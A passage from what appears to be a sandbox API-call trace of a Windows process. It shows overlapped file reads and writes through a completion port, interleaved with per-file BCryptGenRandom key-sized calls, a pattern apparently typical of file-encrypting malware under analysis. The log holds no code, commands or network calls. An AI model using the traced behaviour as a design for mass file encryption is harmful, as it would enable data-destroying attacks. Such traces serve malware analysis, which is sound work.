lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.745] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.756] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.758] CloseHandle (hObject=0x170) returned 1 [0167.758] free (_Block=0x3df0008) [0167.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.785] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.785] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.785] free (_Block=0x3e305b8) [0167.785] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.785] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.786] free (_Block=0x1fa91d0) [0167.786] free (_Block=0x1fa2ed8) [0167.786] free (_Block=0x1fa90b8) [0167.786] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.787] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.818] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1664, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.835] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3998, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.861] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xec4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0167.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.875] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1868, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0167.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.900] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.913] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.913] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.921] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x37f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0167.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.922] CloseHandle (hObject=0x3cc) returned 1 [0167.922] free (_Block=0x3f70048) [0167.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.930] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x167c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0167.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.941] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.951] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.951] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.951] free (_Block=0x3e305b8) [0167.951] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.951] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.952] free (_Block=0x1fa91d0) [0167.952] free (_Block=0x1fa2ed8) [0167.952] free (_Block=0x1fa90b8) [0167.952] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.962] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.962] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.962] free (_Block=0x3e305b8) [0167.962] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.963] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.963] free (_Block=0x1fa91d0) [0167.963] free (_Block=0x1fa2ed8) [0167.963] free (_Block=0x1fa90b8) [0167.963] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.974] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.974] free (_Block=0x3e305b8) [0167.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.974] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.974] free (_Block=0x1fa91d0) [0167.974] free (_Block=0x1fa2ed8) [0167.974] free (_Block=0x1fa90b8) [0167.974] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.985] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7fd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.985] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.008] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.008] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.009] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.009] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.009] free (_Block=0x3e305b8) [0168.009] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.009] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.009] free (_Block=0x1fa91d0) [0168.009] free (_Block=0x1fa2ed8) [0168.009] free (_Block=0x1fa90b8) [0168.009] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.017] CloseHandle (hObject=0x3cc) returned 1 [0168.017] free (_Block=0x3df0008) [0168.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.024] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x8628, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0168.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.045] CloseHandle (hObject=0x170) returned 1 [0168.045] free (_Block=0x3e70008) [0168.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.056] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x211bb, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.063] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.066] CloseHandle (hObject=0x2a4) returned 1 [0168.066] free (_Block=0x1ff1e60) [0168.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.067] CloseHandle (hObject=0x2a8) returned 1 [0168.067] free (_Block=0x3d70450) [0168.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.117] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x18be, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0168.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.117] CloseHandle (hObject=0x170) returned 1 [0168.118] free (_Block=0x3f70048) [0168.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.143] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.143] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.143] free (_Block=0x3e305b8) [0168.143] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.143] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.144] free (_Block=0x1fa91d0) [0168.144] free (_Block=0x1fa2ed8) [0168.144] free (_Block=0x1fa90b8) [0168.144] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.152] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.152] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.152] free (_Block=0x3e305b8) [0168.152] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.152] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.152] free (_Block=0x1fa91d0) [0168.152] free (_Block=0x1fa2ed8) [0168.152] free (_Block=0x1fa90b8) [0168.152] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0168.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.157] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0168.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.167] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.167] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.167] free (_Block=0x3e305b8) [0168.167] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.167] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.167] free (_Block=0x1fa91d0) [0168.167] free (_Block=0x1fa2ed8) [0168.167] free (_Block=0x1fa90b8) [0168.167] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0168.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0168.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0168.177] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.178] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0168.178] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.178] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.178] free (_Block=0x3e305b8) [0168.178] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.178] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.178] free (_Block=0x1fa91d0) [0168.178] free (_Block=0x1fa2ed8) [0168.178] free (_Block=0x1fa90b8) [0168.178] WriteFile (in: hFile=0x308, 